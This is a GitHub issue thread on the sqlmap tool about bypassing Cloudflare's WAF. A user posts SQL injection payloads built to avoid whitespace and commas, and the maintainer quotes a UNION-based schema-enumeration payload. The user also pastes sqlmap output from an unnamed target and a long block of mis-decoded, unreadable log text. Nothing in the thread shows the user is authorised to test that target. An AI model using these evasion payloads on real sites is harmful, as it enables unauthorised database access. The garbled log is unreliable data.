### ISSUE TITLE
Bypass using parenthesis.

### ISSUE THREAD

**Issue by gidsumaya** [sqlmapproject/sqlmap#3157]
Non of the tamper scripts works to bypass Cloudflare WAF.

but this works.
No Whitespace - bypass using parenthesis
?id=(1)and(1)=(1)--

also *No Comma - bypass using OFFSET, FROM and JOIN*
SUBSTR('SQL' FROM 1 FOR 1)  works. but tamper='commalessmid' responses code 403 when executing on sqlmap.

What can I do with it?

**Comment by gidsumaya** [comment]
Also underscore instead of spaces works to bypass.

**Comment by gidsumaya** [comment]
Hello, @stamparm 
Will you please add this on your tamper scripts if appicable?

**Comment by stamparm** [comment]
But what is to be included? sqlmap uses vast amount of queries (SELECT) to enumerate and dump data. Can you please tell me how would you create a bypass for this:

```
-1745 UNION ALL SELECT (SELECT CONCAT(0x71717a6271,IFNULL(CAST(table_name AS CHAR),0x20),0x71706b7171) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x616375617274) LIMIT 5,1),NULL,NULL-- gFgK
```

**Comment by stamparm** [comment]
I'll close this down while we can discuss further in comments down below

**Comment by gidsumaya** [comment]
Hello, I got these
back-end DBMS: MySQL 5 (MariaDB fork)
banner:    'Pp[?'
[02:45:28] [INFO] fetching current user
[02:45:28] [INFO] resumed: p?\xc7\x12~\x03\xffo\xd0?\xff\x90\xff@\x00
[02:45:28] [DEBUG] performed 0 queries in 0.00 seconds
current user:    'p?\xc7~\xffo\xd0?\xff\x90\xff@'
[02:45:28] [INFO] fetching current database
[02:45:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:45:28] [INFO] retrieved: 
[02:45:32] [DEBUG] performed 3 queries in 4.54 seconds
[02:45:32] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current database:	None
[02:45:32] [INFO] fetching server hostname
[02:45:32] [INFO] resumed: |l\x07\x0et\x1fq?{\x7f}xA;}\x07\xde@_\x06\x94k\x05 
[02:45:32] [DEBUG] performed 0 queries in 0.00 seconds
hostname:    '|ltq?{}xA;}\xde@_\x94k'
[02:45:32] [INFO] testing if current user is DBA
[02:45:32] [INFO] fetching current user
current user is DBA:    True
[02:45:32] [INFO] fetching database users
[02:45:32] [INFO] fetching number of database users
[02:45:32] [INFO] resumed: 414758


Also the .sqlmap/output/xxx/logs turned into chinese text. I cant read it, Help please

**Comment by gidsumaya** [comment]
煳浬灡椠敤瑮晩敩⁤桴⁥潦汬睯湩⁧湩敪瑣潩⁮潰湩⡴⥳眠瑩⁨⁡潴慴⁬景㈠ㄲ䠠呔⡐⥳爠煥敵瑳㩳ⴊⴭ倊牡浡瑥牥›ⁱ䜨呅਩††祔数›潢汯慥⵮慢敳⁤汢湩੤††楔汴㩥传⁒潢汯慥⵮慢敳⁤汢湩⁤‭䡗剅⁅牯䠠噁义⁇汣畡敳 †倠祡潬摡›㵱㜭㠰┷⤧传⁒㔱㜵ㄽ㔵‷乁⁄✨✥✽ⴊⴭ戊捡⵫湥⁤䉄卍›祍兓⁌㴾㔠〮〮⠠慍楲䑡⁂潦歲਩煳浬灡爠獥浵摥琠敨映汯潬楷杮椠橮捥楴湯瀠楯瑮猨 牦浯猠潴敲⁤敳獳潩㩮ⴊⴭ倊牡浡瑥牥›ⁱ䜨呅਩††祔数›潢汯慥⵮慢敳⁤汢湩੤††楔汴㩥传⁒潢汯慥⵮慢敳⁤汢湩⁤‭䡗剅⁅牯䠠噁义⁇汣畡敳 †倠祡潬摡›㵱㜭㠰┷⤧传⁒㔱㜵ㄽ㔵‷乁⁄✨✥✽ †嘠捥潴㩲传⁒䥛䙎剅久䕃੝ⴭਭ慢正攭摮䐠䵂㩓愠瑣癩⁥楦杮牥牰湩㩴䴠卹䱑㸠‽⸵⸵‰䴨牡慩䉄映牯⥫猊汱慭⁰敲畳敭⁤桴⁥潦汬睯湩⁧湩敪瑣潩⁮潰湩⡴⥳映潲⁭瑳牯摥猠獥楳湯਺ⴭਭ慐慲敭整㩲焠⠠䕇⥔ †吠灹㩥戠潯敬湡戭獡摥戠楬摮 †吠瑩敬›剏戠潯敬湡戭獡摥戠楬摮ⴠ圠䕈䕒漠⁲䅈䥖䝎挠慬獵੥††慐汹慯㩤焠ⴽ〷㜸✥ 剏ㄠ㔵㴷㔱㜵䄠䑎⠠┧㴧ਧⴭਭ慢正攭摮䐠䵂㩓䴠卹䱑㸠‽⸵⸰‰䴨牡慩䉄映牯⥫猊汱慭⁰敲畳敭⁤桴⁥潦汬睯湩⁧湩敪瑣潩⁮潰湩⡴⥳映潲⁭瑳牯摥猠獥楳湯਺ⴭਭ慐慲敭整㩲焠⠠䕇⥔ †吠灹㩥戠潯敬湡戭獡摥戠楬摮 †吠瑩敬›剏戠潯敬湡戭獡摥戠楬摮ⴠ圠䕈䕒漠⁲䅈䥖䝎挠慬獵੥††慐汹慯㩤焠ⴽ〷㜸✥ 剏ㄠ㔵㴷㔱㜵䄠䑎⠠┧㴧ਧⴭਭ慢正攭摮䐠䵂㩓䴠卹䱑㸠‽⸵⸰‰䴨牡慩䉄映牯⥫猊汱慭⁰敲畳敭⁤桴⁥潦汬睯湩⁧湩敪瑣潩⁮潰湩⡴⥳映潲⁭瑳牯摥猠獥楳湯਺ⴭਭ慐慲敭整㩲焠⠠䕇⥔ †吠灹㩥戠潯敬湡戭獡摥戠楬摮 †吠瑩敬›剏戠潯敬湡戭獡摥戠楬摮ⴠ圠䕈䕒漠⁲䅈䥖䝎挠慬獵੥††慐汹慯㩤焠ⴽ〷㜸✥ 剏ㄠ㔵㴷㔱㜵䄠䑎⠠┧㴧ਧ††敖瑣牯›剏嬠义䕆䕒䍎嵅ⴊⴭ戊捡⵫湥⁤䉄卍›祍兓⁌㴾㔠〮〮⠠慍楲䑡⁂潦歲਩煳浬灡爠獥浵摥琠敨映汯潬楷杮椠橮捥楴湯瀠楯瑮猨 牦浯猠潴敲⁤敳獳潩㩮ⴊⴭ倊牡浡瑥牥›ⁱ䜨呅਩††祔数›潢汯慥⵮慢敳⁤汢湩੤††楔汴㩥传⁒潢汯慥⵮慢敳⁤汢湩⁤‭䡗剅⁅牯䠠噁义⁇汣畡敳 †倠祡潬摡›㵱㜭

I got these characters on .sqlmap/output/xxx/logs. I rerun with --flush-session because I cant read it

**Comment by stamparm** [comment]
@gidsumaya  You are getting total junk inside https://github.com/sqlmapproject/sqlmap/issues/3157#issuecomment-399778643. Not sure how this has anything to do with the original issue

**Comment by gidsumaya** [comment]
Oh I see, do you think I'm dealing with a false positive? or non-vulnerable parameter?  Thanks
